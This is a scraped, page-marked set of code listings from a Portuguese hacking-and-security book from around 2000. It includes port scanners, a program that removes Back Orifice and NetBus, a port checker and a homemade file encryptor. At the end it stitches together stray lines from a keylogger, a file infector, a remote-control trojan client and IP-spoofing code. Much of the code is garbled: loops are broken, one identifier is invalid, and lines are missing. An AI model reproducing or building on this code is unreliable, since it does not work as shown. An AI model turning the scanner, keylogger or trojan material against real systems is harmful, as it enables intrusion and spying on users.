int i;
int16 val;
for(i = 0; i < len; i++) {

val = *src;
SSVAL(dst,0,val);
dst++;
src++;
if(val == 0)
break;
}
return i;
}
<--> NTPWC/ntpwc.c
EOF
Página 316
Public NumWait As Integer 'how many secs to wait for response

Public UpperB As Integer
Const HWND_TOP = 0
Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Const SWP_NOMOVE = &H2
Const SWP_NOSIZE = &H1
Const flags = SWP_NOMOVE Or SWP_NOSIZE
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal
hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal
cy As Long, ByVal wFlags As Long) As Long
Dim LowerB As Integer

Dim PortFound As Boolean
Dim StopSrch As Boolean
Dim FirstRun As Boolean
Dim StopIt As Boolean
Sub stayontop(the As Form)
SetWinOnTop = SetWindowPos(the.hWnd, HWND_TOPMOST, 0, 0, 0, 0, flags)
End Sub
Private Sub Command1_Click()

If sock.State <> 0 Then
sock.Close
Do Until sock.State = 0
DoEvents
Loop
End If
If Command1.Caption = "Start" Then
Command1.Caption = "Stop"
PortFound = False
FirstRun = True
If Check1.Value = 1 Then
StopSrch = True
Else
StopSrch = False
End If
If Option2.Value = True Then
If Text2.Text <> "" And Text3.Text <> "" Then
UpperB = Int(Val(Text3.Text))
LowerB = Int(Val(Text2.Text))
Else
MsgBox "Must Specify Ports To Find", vbExclamation + vbMsgBoxSetForeground
+ vbOKOnly, "Port Finder"
End If
ElseIf Option1.Value = True Then
UpperB = 32767
LowerB = 1
End If
If Text4.Text = "" Then
Text4.Text = "5"
End If
NumWait = Int(Val(Text4.Text))
Label2.Caption = "Scanning Ports..."

sock.RemoteHost = Text1.Text
sock.LocalPort = 0
For qw% = LowerB To UpperB
If StopIt = True Then
Command1.Caption = "Start"
Label2.Caption = "Canceled...No Connections"
StopIt = False
Exit Sub
End If
sock.Connect sock.RemoteHost, qw%
start = 0
start = (Timer)
StopIt = False
Exit Sub
End If
DoEvents
If (Timer) - (start) >= NumWait Then
sock.Close
DoEvents
StopIt = False
Exit Sub
End If
Loop
Exit Do
End If
Loop
If sock.State = 7 Then
If FirstRun = True Then
Label2.Caption = "Open port found: " & qw%
Else
Label2.Caption = Label2.Caption & ", " & qw%
End If
PortFound = True
FirstRun = False
sock.Close
DoEvents
Loop
If StopSrch = True Then
Exit For
End If
End If
Next qw%
If PortFound = False Then
Label2.Caption = "No Ports Found"
End If
Label2.Caption = Label2.Caption & " ...Done"
Else
'stop
StopIt = True
End If
If Command1.Caption = "Start" Then
Command1.Caption = "Stop"
Exit Sub
ElseIf Command1.Caption = "Stop" Then
End If
End Sub
Private Sub Command2_Click()
End Sub
Private Sub Form_Activate()

stayontop Me
End Sub
Private Sub Form_Load()

StopIt = False
sock.Protocol = sckTCPProtocol
Me.Visible = True
stayontop Me
End Sub
Private Sub Form_Resize()

stayontop Me
End Sub
Private Sub Form_Unload(Cancel As Integer)

sock.Close
DoEvents
Loop
Cancel = False
End Sub
Private Sub Label2_Click()

MsgBox "" & Label2.Caption & "", vbMsgBoxSetForeground + vbOKOnly, "Port Finder"
End Sub
Página 328
unit mpsunit1;
interface
uses
StdCtrls, ExtCtrls, ScktComp;
type
TForm1 = class(TForm)
Bevel1: TBevel;
Bevel2: TBevel;
Label1: TLabel;
Edit1: TEdit;
Label2: TLabel;
Edit2: TEdit;
Edit3: TEdit;
Label3: TLabel;
Bevel3: TBevel;
Button1: TButton;
Button2: TButton;
Button3: TButton;
Button4: TButton;
Bevel4: TBevel;
Edit4: TEdit;
ListBox1: TListBox;
ps: TClientSocket;
procedure Button1Click(Sender: TObject);
procedure psConnect(Sender: TObject; Socket: TCustomWinSocket);
procedure psError(Sender: TObject; Socket: TCustomWinSocket;
private
public
end;
var
Form1: TForm1;
portno:integer;
implementation
{$R *.DFM}
procedure TForm1.Button1Click(Sender: TObject);

begin
button1.enabled:=false;
edit1.enabled:=false;
button2.enabled:=true;
portno:=strtoint(edit2.text);
ps.address:=edit1.text;
ps.port:=portno;
ps.active:=true;
end;
procedure TForm1.psConnect(Sender: TObject; Socket: TCustomWinSocket);
label son;
begin
listbox1.items.add('Connect on Port: '+inttostr(portno));
ps.active:=false;
portno:=portno+1;
if portno > strtoint(edit3.text) then goto son else
ps.port:=portno;
ps.active:=true;
son:
end;
procedure TForm1.psError(Sender: TObject; Socket: TCustomWinSocket;

label son;
begin
errorcode:=0;
edit4.text:='Scanned Port No: '+inttostr(portno);
ps.active:=false;
portno:=portno+1;
if portno > strtoint(edit3.text) then goto son else
ps.port:=portno;
ps.active:=true;
son:
end;

begin
portno:=strtoint(edit3.text);
button1.enabled:=true;
edit1.enabled:=true;
button2.enabled:=false;
end;

begin
edit4.text:='';
listbox1.items.clear;
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
ps.active:=false;
end;

begin
ShowMessage('Meliksah Port Scanner v0.1 Beta'+#13+
'(C)opyright 1999 Meliksah Ozoral'+#13+
' All Rights Reserved '+#13+#13+
' http://www.mimsa.com/meliksah '+#13+
' mozoral@mimsa.com ');
end;
end.
Página 380
Attribute VB_Name = "ANTIBACK"

Option Explicit
' Rotinas Diversas
Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA"

_
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias

"GetWindowsDirectoryA" _
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function ExitWindowsEx Lib "user32" _

(ByVal uFlags As Long, ByVal dwReserved As Long) As Long
' Trabalhar com o Registry do Windows
Public Const REG_SZ As Long = 1

Public Const REG_BINARY As Long = 3
Public Const REG_DWORD As Long = 4
Public Const HKEY_CLASSES_ROOT = &H80000000

Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const ERROR_NONE = 0

Public Const ERROR_BADDB = 1
Public Const ERROR_BADKEY = 2
Public Const ERROR_CANTOPEN = 3
Public Const ERROR_CANTREAD = 4
Public Const ERROR_CANTWRITE = 5
Public Const ERROR_OUTOFMEMORY = 6
Public Const ERROR_INVALID_PARAMETER = 7
Public Const ERROR_ACCESS_DENIED = 8
Public Const ERROR_INVALID_PARAMETERS = 87
Public Const ERROR_NO_MORE_ITEMS = 259
Public Const KEY_ALL_ACCESS = &H3F
Public Const REG_OPTION_NON_VOLATILE = 0
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As

Long
Public Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA"

_
(ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal Reserved As Long, ByVal lpClass As String, _
ByVal dwOptions As Long, ByVal samDesired As Long, _
ByVal lpSecurityAttributes As Long, phkResult As Long,
_
lpdwDisposition As Long) As Long
Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _

(ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal ulOptions As Long, ByVal samDesired As Long, _
phkResult As Long) As Long
Public Declare Function RegQueryValueExString Lib "advapi32.dll" Alias _

"RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As
String, _
ByVal lpReserved As Long, lpType As Long, _
ByVal lpData As String, lpcbData As Long) As
Long
Public Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias _

String, _
lpData As Long, lpcbData As Long) As Long
Public Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias _

String, _
ByVal lpData As Long, lpcbData As Long) As
Long
Public Declare Function RegSetValueExString Lib "advapi32.dll" Alias

"RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, _
ByVal lpValue As String, ByVal cbData As Long) As Long
Public Declare Function RegSetValueExLong Lib "advapi32.dll" Alias

"RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, _
ByVal cbData As Long) As Long
Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As

Long, _
vValue As Variant) As Long
' Declaracao de Variaveis

Dim lValue As Long
Dim sValue As String
' Verificacao
Select Case lType
Case REG_SZ
sValue = vValue & Chr$(0)
SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue,
Len(sValue))
Case REG_DWORD
lValue = vValue
SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4)
End Select
End Function
Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, _

vValue As Variant) As Long
On Error GoTo QueryValueExError

Dim cch As Long
Dim lrc As Long
Dim lType As Long
Dim lValue As Long
Dim sValue As String
Dim nLoop As Long
Dim sBinaryString As String
' Determina o Tamanho e o Tipo de Dado a Ler

lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)
If lrc <> ERROR_NONE Then Error 5
Select Case lType

' Strings ...
Case REG_SZ:
sValue = String(cch, 0)
lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch)
If lrc = ERROR_NONE Then

vValue = Left$(sValue, cch - 1)
Else
vValue = Empty
End If
' DWORDS ...

Case REG_DWORD:
lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch)
If lrc = ERROR_NONE Then vValue = lValue
Case Else
' Todos Outros Tipos de Dados Não Suportados
lrc = -1
End Select
QueryValueExExit:
QueryValueEx = lrc
Exit Function
QueryValueExError:
Resume QueryValueExExit
End Function
Public Sub CreateNewKey(sNewKeyName As String, lPredefinedKey As Long)

Dim hNewKey As Long
Dim lRetVal As Long
lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString,

REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal)
RegCloseKey (hNewKey)
End Sub
Public Sub SetKeyValue(sKeyName As String, sValueName As String, vValueSetting As

Variant, _
lValueType As Long)
Dim lRetVal As Long

Dim hKey As Long
lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyName, 0, KEY_ALL_ACCESS, hKey)

lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting)
RegCloseKey (hKey)
End Sub
Public Sub SetKeyValue2(sKeyName As String, sValueName As String, _

vValueSetting As Variant, lValueType As Long)
Dim lRetVal As Long

Dim hKey As Long
lRetVal = RegOpenKeyEx(HKEY_USERS, sKeyName, 0, KEY_ALL_ACCESS, hKey)

lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting)
RegCloseKey (hKey)
End Sub
Public Function QueryValue(sKeyName As String, sValueName As String) As String

Dim lRetVal As Long
Dim hKey As Long
Dim vValue As Variant
lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyName, 0, KEY_ALL_ACCESS, hKey)

lRetVal = QueryValueEx(hKey, sValueName, vValue)
QueryValue = vValue
RegCloseKey (hKey)
End Function
Public Function QueryValue2(sKeyName As String, sValueName As String) As String

Dim lRetVal As Long
Dim hKey As Long
Dim vValue As Variant
lRetVal = RegOpenKeyEx(HKEY_USERS, sKeyName, 0, KEY_ALL_ACCESS, hKey)

lRetVal = QueryValueEx(hKey, sValueName, vValue)
QueryValue2 = vValue
RegCloseKey (hKey)
End Function
'
' Funcao Principal
'
Public Sub Main()

On Error Resume Next

Dim cDiretorioSystem As String
Dim cDiretorioWindows As String
Dim cPosicaoRegistry As String

Dim cBackdoor As String
Dim cTitulo As String
Dim cBuffer As String * 255
Dim lDarBoot As Boolean

Dim nResposta As Long
Dim xRetorno As Variant
' Titulo
cTitulo = "Senna Spy Anti-Backdoor 1.0 - By 2801Megazine - Edicao 2, 1998"
' Mensagem
MsgBox cTitulo + " - Ativada"
' Obtem o Diretorio System do Windows

nResposta = GetSystemDirectory(cBuffer, Len(cBuffer))
cDiretorioSystem = Left(cBuffer, nResposta) + "\"
' Obtem o Diretorio do Windows

nResposta = GetWindowsDirectory(cBuffer, Len(cBuffer))
cDiretorioWindows = Left(cBuffer, nResposta) + "\"
'
' Verifica se Existem os Ficheiros das Backdoor´s a Serem Eliminadas
'
' Aqui, a Exclusão da Back Orifice

cBackdoor = cDiretorioSystem + " .EXE"
SetAttr cBackdoor, vbNormal
Kill cBackdoor
' Aqui, a Exclusão da NetBus

cBackdoor = cDiretorioWindows + "PATCH.EXE"
Kill cBackdoor
' Aqui, a Exclusão do Graffiti Explorer

cBackdoor = cDiretorioSystem + "EXPLORER.EXE"
Kill cBackdoor
' Aqui, a Exclusão do Sockets de Troie

cBackdoor = cDiretorioSystem + "SOCKETS23.EXE"
Kill cBackdoor
cBackdoor = cDiretorioWindows + "SOCKETS23.EXE"

Kill cBackdoor
' Aqui, a Exclusão da The Mask Robot

cBackdoor = cDiretorioSystem + "MGADESKDLL.EXE"
Kill cBackdoor
cBackdoor = cDiretorioSystem + "CSMCTRL32.EXE"

Kill cBackdoor
cBackdoor = cDiretorioWindows + "RSRCLOAD.EXE"

Kill cBackdoor
' Aqui, a Exclusão da Master Paradise

cBackdoor = cDiretorioWindows + "SYSEDIT.EXE"
Kill cBackdoor
cBackdoor = cDiretorioWindows + "KEYHOOK.DLL"

Kill cBackdoor
' Aqui, a Exclusão da WINRUN

cBackdoor = cDiretorioWindows + "WINRUN.EXE"
Kill cBackdoor
cBackdoor = cDiretorioSystem + "WINRUN.EXE"

Kill cBackdoor
' Aqui, a Exclusão da WIN32X

cBackdoor = cDiretorioWindows + "WIN32X.EXE"
Kill cBackdoor
cBackdoor = cDiretorioSystem + "WIN32X.EXE"

Kill cBackdoor
' Flag Para Controlar Se Deve Dar Boot no Micro ou Não
lDarBoot = False
'
' Controla o Registry Infinitamente, a Fim de Dectectar Inclusoes
'
While True
DoEvents
' Verifica se o Back Orifice Esta Sendo Instalado Neste Momento

cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
If UCase(QueryValue(cPosicaoRegistry, "")) = " .EXE" Then

SetKeyValue cPosicaoRegistry, "", "", REG_SZ
MsgBox "ATENCAO: Back Orifice Encontrado e Removido !", vbOKOnly,

cTitulo
lDarBoot = True
End If
' Verifica se o NetBus Esta Sendo Instalado Neste Momento

cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
If UCase(QueryValue(cPosicaoRegistry, "PATCH")) = "PATCH.EXE" Then

SetKeyValue cPosicaoRegistry, "PATCH", "", REG_SZ
MsgBox "ATENCAO: NetBus Encontrado e Removido !", vbOKOnly, cTitulo

lDarBoot = True
End If
' Verifica se o Graffiti Explorer Esta Sendo Instalado Neste Momento

If UCase(QueryValue(cPosicaoRegistry, "EXPLORER")) = "EXPLORER.EXE" Then

SetKeyValue cPosicaoRegistry, "EXPLORER", "", REG_SZ
MsgBox "ATENCAO: Graffiti Explorer Encontrado e Removido !", vbOKOnly,

cTitulo
lDarBoot = True
End If
' Verifica se o The Mask Robot-1 Esta Sendo Instalado Neste Momento
If UCase(QueryValue(cPosicaoRegistry, "Load RSRCLOAD")) <> "" Then

SetKeyValue cPosicaoRegistry, "Load RSRCLOAD", "", REG_SZ
MsgBox "ATENCAO: The Mask Robot-1 Encontrado e Removido !", vbOKOnly,

cTitulo
lDarBoot = True
End If
' Verifica se o The Mask Robot-2 Esta Sendo Instalado Neste Momento
cPosicaoRegistry = ".Default\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
If UCase(QueryValue2(cPosicaoRegistry, "Load MGADESKDLL")) <> "" Then

SetKeyValue2 cPosicaoRegistry, "Load MGADESKDLL", "", REG_SZ
MsgBox "ATENCAO: The Mask Robot-2 Encontrado e Removido !", vbOKOnly,

cTitulo
lDarBoot = True
End If
' Verifica se o Master Paradise Esta Sendo Instalado Neste Momento

If UCase(QueryValue(cPosicaoRegistry, "SYSEDIT")) = "SYSEDIT.EXE" Then

SetKeyValue cPosicaoRegistry, "SYSEDIT", "", REG_SZ
MsgBox "ATENCAO: Master Paradise Encontrado e Removido !", vbOKOnly,

cTitulo
lDarBoot = True
End If
' Verifica se o WIN32X Esta Sendo Instalado Neste Momento

If UCase(QueryValue(cPosicaoRegistry, "WIN32X")) <> "" Then

SetKeyValue cPosicaoRegistry, "WIN32X", "", REG_SZ
MsgBox "ATENCAO: WIN32X Encontrado e Removido !", vbOKOnly, cTitulo

lDarBoot = True
End If
' Verifica se o WINRUN Esta Sendo Instalado Neste Momento

If UCase(QueryValue(cPosicaoRegistry, "WINRUN")) <> "" Then

SetKeyValue cPosicaoRegistry, "WINRUN", "", REG_SZ
MsgBox "ATENCAO: WINRUN Encontrado e Removido !", vbOKOnly, cTitulo

lDarBoot = True
End If
' Necessario dar Boot ?

If lDarBoot Then
MsgBox "Sera Necessario Resetar o Sistema !", vbOKOnly, cTitulo
' Reseta
xRetorno = ExitWindowsEx(67, 0)
End If
Wend
End Sub
Página 392
/*****
*
* portcheck.c - Check if Port is Busy
*
* - Windows 95, 98, NT and 2000 Compatible
* - Borland C++ and LCCWin32 Compilers Tested !
*
*****/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
/*///////////////////////////////////////////////////////
// //
// CheckPortUDP() - Check if UDP Port is Busy or Not //
// //
///////////////////////////////////////////////////////*/
int CheckPortUDP( short int nPort )

{
struct sockaddr_in nSockServer;
WSADATA wsaData;
int lBusy = 0;
int nSocket;
/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
/* Check UDP Protocol */

nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,

sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
/* Close Socket if Busy */

if( lBusy )
closesocket( nSocket );
/* Close Winsock */
WSACleanup();
}
/* Return */
return( lBusy );
}
/*///////////////////////////////////////////////////////
// //
// CheckPortTCP() - Check if TCP Port is Busy or Not //
// //
///////////////////////////////////////////////////////*/
int CheckPortTCP( short int nPort )

{
struct sockaddr_in nSockServer;
WSADATA wsaData;
int lBusy = 0;
int nSocket;
/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
/* Check TCP Protocol */

nSocket = socket( AF_INET, SOCK_STREAM, 0 );
lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,

sizeof( nSockServer ) ) == 0 );
/* Close Socket if Busy */

if( lBusy )
closesocket( nSocket );
/* Close Winsock */
WSACleanup();
}
/* Return */
return( lBusy );
}
/*/////////////////////////////
// //
// Main Function - Example //
// //
/////////////////////////////*/
int main()
{
/* Check for TCP Port */
if( CheckPortTCP( 21 ) )
puts( "FTP Port is Busy !\n" );
else
puts( "FTP Port isn't Busy !\n" );
/* Check for UDP Port */
if( CheckPortUDP( 31337 ) )

puts( "BackOrifice Found in your System !" );
else
puts( "BackOrifice not found in your System !" );
return 0;
}
Página 418
#include <string.h>
#include <stdlib.h>
#include <io.h>
#include <stdio.h>
FILE *arq1,*arq2;
void mensagem_final()
{ printf("\n\t\tPrograma desenvolvido por\n");
printf("\t\t APOCALYPSE THE CLAN by\n");
printf("\t\t\tMr DeaTh.\n\n");
printf("\t\t\t\t\t\t\tLooK aROunD, See YoUR EneMY");
fclose(arq1);fclose(arq2);
return; }
int teste_de_existencia(char n1[],char n2[])
{ int vi=1;
if ((arq1=fopen(n1,"rb"))==NULL){
printf("O ficheiro %s não foi encontrado.\n",n1);vi=0;}
if ((arq2=fopen(n2,"rb"))!=NULL){
printf("O ficheiro %s já existe.\n",n2);vi=0;}
if (vi==1){
fclose(arq2);
arq2=fopen(n2,"wb");}
return vi;}
int converte(int y)
{ int x=y;
if (y==65) x=98;if (y==98) x=65;
if (y==66) x=105;if (y==105) x=66;
if (y==67) x=68;if (y==68) x=67;
if (y==69) x=130;if (y==130) x=69;
if (y==70) x=40;if (y==40) x=70;
if (y==71) x=135;if (y==135) x=71;
if (y==72) x=37;if (y==37) x=72;
if (y==73) x=164;if (y==164) x=73;
if (y==74) x=50;if (y==50) x=74;
if (y==75) x=160;if (y==160) x=75;
if (y==76) x=99;if (y==99) x=76;
if (y==77) x=110;if (y==110) x=77;
if (y==78) x=61;if (y==61) x=78;
if (y==79) x=144;if (y==144) x=79;
if (y==80) x=33;if (y==33) x=80;
if (y==81) x=100;if (y==100) x=81;
if (y==82) x=63;if (y==63) x=82;
if (y==83) x=101;if (y==101) x=83;
if (y==84) x=59;if (y==59) x=84;
if (y==85) x=149;if (y==149) x=85;
if (y==86) x=45;if (y==45) x=86;
if (y==87) x=115;if (y==115) x=87;
if (y==88) x=47;if (y==47) x=88;
if (y==89) x=120;if (y==120) x=89;
if (y==90) x=62;if (y==62) x=90;
if (y==92) x=102;if (y==102) x=92;
if (y==97) x=42;if (y==42) x=97;
if (y==103) x=56;if (y==56) x=103;
if (y==104) x=48;if (y==48) x=104;
if (y==106) x=60;if (y==60) x=106;
if (y==107) x=58;if (y==58) x=107;
if (y==108) x=46;if (y==46) x=108;
if (y==109) x=119;if (y==119) x=109;
if (y==111) x=147;if (y==147) x=111;
if (y==112) x=32;if (y==32) x=112;
if (y==113) x=121;if (y==121) x=113;
if (y==114) x=131;if (y==131) x=114;
if (y==116) x=118;if (y==118) x=116;
if (y==117) x=122;if (y==122) x=117;
return x;}
int caixa_preta(int t,char n1[],unsigned char n2)
{ int x;
x=(*n1=='e')?t^n2:~(t^(~n2));
return x; }
int super(int t,int r1,int r2,int r3,int r4)
{ int x=converte(t);
x=converte(255-x+r1-r2+r3-r4);
return x;}
char *palavra-chave(char n[])
{ char *snh;
printf("Escreva a palavra-chave:\n");
scanf("%s",snh);
if (*n=='e') printf("\n\t\tCuidado para não esquecer esta palavra-
chave!\n\n");
return snh;}
void main(int n,char *o[])
{ int t,r1,r2,r3,r4,e,i=strlen(o[1]);
if (o[1][0]<97) o[1][0]=o[1][0]+32;
if (n!=4 || (*o[1]!='e' && *o[1]!='d') || i!=1) {
printf("KRIPT 2.00 Copyright (c) 1997-98 Mr Death\n");
printf("KRIPT Encriptador-Desencriptador de ficheiros texto.\n\n");
printf("Sintaxe: kript <comando> <ficheiro1> <ficheiro2>\n");
printf("<comando>: d -> Desencripta\n");
printf(" e -> Encripta\n");
printf("<ficheiro1>: ficheiro a ser lido\n");
printf("<ficheiro2>: ficheiro a ser criado\n"); }
else {
randomize();
e=teste_de_existencia(o[2],o[3]);
unsigned long c=0,s=filelength(fileno(arq1));char *snh;
for (i=0;i<80;i++) snh[i]=0;i=0;
if (*o[1]=='e' && e==1) {
snh=palavra-chave(o[1]);
r1=random(10);r2=random(10);r3=random(20);r4=random(20);
fputc(r1+65,arq2);fputc(r2+65,arq2);
fputc(r3+65,arq2);fputc(r4+65,arq2);
while (c<s) {
t=fgetc(arq1);c++;
t=caixa_preta(t,o[1],snh[i]);
t=super(t,r1,r2,r3,r4);
i=(snh[i+1]==0)?0:i+1;
fputc(t,arq2);}
printf("Encriptado!");}
if (*o[1]=='d' && e==1) {
snh=palavra-chave(o[1]);
r1=fgetc(arq1)-65;r2=fgetc(arq1)-65;
r3=fgetc(arq1)-65;r4=fgetc(arq1)-65;c=4;
if (r1<0 || r1>9 || r2<0 || r2>9 || r3<0 || r3>19 || r4<0 ||
r4>19)
printf("O ficheiro %s não foi encriptado com
KRIPT.\n",o[2]);
else {
while (c<s) {
t=fgetc(arq1);c++;
t=super(t,r1,r2,r3,r4);
t=caixa_preta(t,o[1],snh[i]);
i=(snh[i+1]==0)?0:i+1;
fputc(t,arq2);}
printf("Desencriptado!");}}
mensagem_final();}
return;
}

Tecnicas para Hackers - Wilson Oliveira

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Tecnicas para Hackers - Wilson Oliveira

Încărcat de

Drepturi de autor:

Formate disponibile

Programas do livro: TÉCNICAS PARA HACKERS – SOLUÇÕES PARA SEGURANÇA 1

Conforme explicado no livro, este ficheiro contém os Programas (com duas ou

Esperamos prestar desse modo o melhor serviço aos nossos leitores.

Qualquer sugestão ou pedido de esclarecimento podem ser dirigidos a

Versão 1.0 de 31/Jul/2000

procedure TForm1.Label1Click(Sender: TObject);

procedure TForm1.KeySpyKeySpyDown(Sender: TObject; Key: Byte;

{ For 16-bit only}

procedure TForm1.KeySpyKeySpyUp(Sender: TObject; Key: Byte;

procedure TForm1.KeySpyKeyword(Sender: TObject);

procedure TForm1.KeySpyLayoutChanged(Sender: TObject; Layout: string);

procedure TForm1.KeySpyActiveTitleChanged(Sender: TObject;

{ For 16-bit only}

procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);

constructor TKeySpy.Create(AOwner: TComponent);

procedure TKeySpy.WndProc(var Msg: TMessage);

procedure TKeySpy.SetEnabled(Value: Boolean);

procedure TKeySpy.SetKeyword(Value: String);

procedure TKeySpy.SetNothingStr(Value: String); begin {} end;

If Ficheiros$(nome$) <> "" Then Kill nome$

If normal$ = "" Then Goto NoWay

If so$ = "Windows" Then Goto Windows

assign(FromF,nome_arq); {nome_arq: explicado mais tarde}

if MOSTRA then writeln('Infecção completa.');

BlockWrite (FlT, buffer, Length(RST)-9, SC);

if loading then txtHid.Text:=txtHid.Text+RST;

if pos('TPL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then

procedure TClientForm.txtLogDblClick(Sender: TObject);

procedure TClientForm.sbResetClick(Sender: TObject);

procedure TClientForm.cmdSaveClick(Sender: TObject);

procedure TClientForm.PingserverAlive1Click(Sender: TObject);

procedure TClientForm.mnuPlaySoundClick(Sender: TObject);

procedure TClientForm.mnuShowPicClick(Sender: TObject);

procedure TClientForm.tvAppKeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.portvalue1KeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.IP1KeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.PortChangeKeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.cmdSaveKeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.FormKeyDown(Sender: TObject; var Key: Word;

procedure TClientForm.mnuShowClick(Sender: TObject);

procedure TClientForm.mnuURLClick(Sender: TObject);

procedure TClientForm.tvAppExpanding(Sender: TObject; Node: TTreeNode;

procedure TClientForm.tvAppCollapsing(Sender: TObject; Node: TTreeNode;

procedure TClientForm.sbFileManagerClick(Sender: TObject);

procedure TClientForm.tvAppDblClick(Sender: TObject);

procedure TClientForm.tvAppRatoDown(Sender: TObject; Button: TRatoButton;

procedure TClientForm.pmFilePopup(Sender: TObject);

procedure TClientForm.mnuDeleteClick(Sender: TObject);

if MessageDlg ('Really delete '+DupAmps(Path)+' ?', mtConfirmation, [mbYes,

procedure TClientForm.mnuRunClick(Sender: TObject);

procedure TClientForm.mnuDownloadClick(Sender: TObject);

procedure TfrmMessage.FormCreate(Sender: TObject);

procedure TfrmMessage.sbNoIconClick(Sender: TObject);

procedure TfrmMessage.sbWarningClick(Sender: TObject);

procedure TfrmMessage.sbInfoClick(Sender: TObject);

procedure TfrmMessage.sbStopClick(Sender: TObject);

procedure TfrmMessage.sbQuestClick(Sender: TObject);

procedure TfrmMessage.cmdTestClick(Sender: TObject);

procedure TfrmMessage.cmdCancelClick(Sender: TObject);

procedure TfrmMessage.cmdSendClick(Sender: TObject);

FindFirst (extract (gotstr, 8, Length(gotstr))+'*.*',

procedure TServerForm.FormClose(Sender: TObject; var Action: TCloseAction);

procedure TServerForm.PTimerTimer(Sender: TObject);

FindFirst (extract (gotstr, 8, Length(gotstr))+'.',

ih->check=ip_sum(buf, (4ih->ihl + sizeof(th)+ dlen + 1) & ~1);

if(sendto(ssock, buf, 4ih->ihl + sizeof(th)+ dlen, 0, &sin,

spoof_open(/0xe1e26d0a/ me_fake, them, x);

static int _my_mbstowcs(int16, uchar, int);

if (HexToBin((unsigned char)pTemp, (uchar)pUserInfo->ntpassword,16) ==